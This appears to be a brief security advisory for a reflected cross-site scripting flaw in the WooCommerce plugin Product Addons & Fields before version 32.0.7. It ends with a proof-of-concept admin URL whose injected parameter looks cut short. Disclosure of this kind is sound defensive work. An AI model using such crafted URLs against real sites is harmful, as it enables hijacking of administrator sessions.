Product Addons & Fields for WooCommerce < 32.0.7 - Reflected Cross-Site Scripting

The plugin does not sanitize and escape some URL parameters, leading to Reflected Cross-Site Scripting.

PoC

Ensure WooCommerce is installed. Visit the following path, while logged in as an Admin: /wp-admin/admin.php?page=ppom&productmeta;_id=5&do;_meta=edit&">=1